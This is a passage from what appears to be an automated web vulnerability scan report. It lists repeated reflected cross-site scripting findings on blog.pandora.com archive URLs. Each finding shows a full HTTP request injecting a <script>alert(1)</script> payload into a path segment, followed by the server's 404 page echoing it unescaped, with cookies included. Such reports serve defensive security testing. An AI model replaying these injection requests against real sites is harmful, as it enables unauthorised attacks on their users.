Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...

1.130. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...

1.131. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...

1.132. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...

1.133. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...

1.134. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...

1.135. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...

1.136. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...

1.137. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...

1.138. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...

1.139. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...

1.140. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...

1.141. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...

1.142. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...

1.143. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...

1.144. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...

1.145. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...

1.146. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
